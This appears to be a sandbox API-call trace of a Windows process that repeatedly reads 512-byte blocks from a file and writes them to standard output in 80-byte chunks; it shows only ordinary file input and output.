[0132.250] GetFileType (hFile=0x50) returned 0x1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] GetFileType (hFile=0x50) returned 0x1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.250] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] GetFileType (hFile=0x50) returned 0x1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] GetFileType (hFile=0x50) returned 0x1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.251] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.251] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.251] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] GetFileType (hFile=0x50) returned 0x1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] GetFileType (hFile=0x50) returned 0x1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] GetFileType (hFile=0x50) returned 0x1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] GetFileType (hFile=0x50) returned 0x1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] GetFileType (hFile=0x50) returned 0x1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] GetFileType (hFile=0x50) returned 0x1 [0132.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.251] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] GetFileType (hFile=0x50) returned 0x1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] GetFileType (hFile=0x50) returned 0x1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.252] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.252] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.252] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] GetFileType (hFile=0x50) returned 0x1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] GetFileType (hFile=0x50) returned 0x1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] GetFileType (hFile=0x50) returned 0x1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] GetFileType (hFile=0x50) returned 0x1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.252] GetFileType (hFile=0x50) returned 0x1 [0132.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] GetFileType (hFile=0x50) returned 0x1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] GetFileType (hFile=0x50) returned 0x1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] GetFileType (hFile=0x50) returned 0x1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.253] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.253] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.253] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] GetFileType (hFile=0x50) returned 0x1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] GetFileType (hFile=0x50) returned 0x1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] GetFileType (hFile=0x50) returned 0x1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] GetFileType (hFile=0x50) returned 0x1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.253] GetFileType (hFile=0x50) returned 0x1 [0132.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] GetFileType (hFile=0x50) returned 0x1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] GetFileType (hFile=0x50) returned 0x1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] GetFileType (hFile=0x50) returned 0x1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.254] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.254] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.254] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] GetFileType (hFile=0x50) returned 0x1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] GetFileType (hFile=0x50) returned 0x1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] GetFileType (hFile=0x50) returned 0x1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] GetFileType (hFile=0x50) returned 0x1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.254] GetFileType (hFile=0x50) returned 0x1 [0132.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] GetFileType (hFile=0x50) returned 0x1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] GetFileType (hFile=0x50) returned 0x1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] GetFileType (hFile=0x50) returned 0x1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.255] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.255] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.255] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] GetFileType (hFile=0x50) returned 0x1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] GetFileType (hFile=0x50) returned 0x1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] GetFileType (hFile=0x50) returned 0x1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] GetFileType (hFile=0x50) returned 0x1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.255] GetFileType (hFile=0x50) returned 0x1 [0132.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] GetFileType (hFile=0x50) returned 0x1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] GetFileType (hFile=0x50) returned 0x1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] GetFileType (hFile=0x50) returned 0x1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.256] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.256] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.256] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] GetFileType (hFile=0x50) returned 0x1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] GetFileType (hFile=0x50) returned 0x1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] GetFileType (hFile=0x50) returned 0x1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] GetFileType (hFile=0x50) returned 0x1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.256] GetFileType (hFile=0x50) returned 0x1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] GetFileType (hFile=0x50) returned 0x1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] GetFileType (hFile=0x50) returned 0x1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] GetFileType (hFile=0x50) returned 0x1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.257] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.257] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.257] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] GetFileType (hFile=0x50) returned 0x1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] GetFileType (hFile=0x50) returned 0x1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] GetFileType (hFile=0x50) returned 0x1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] GetFileType (hFile=0x50) returned 0x1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.257] GetFileType (hFile=0x50) returned 0x1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] GetFileType (hFile=0x50) returned 0x1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] GetFileType (hFile=0x50) returned 0x1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) 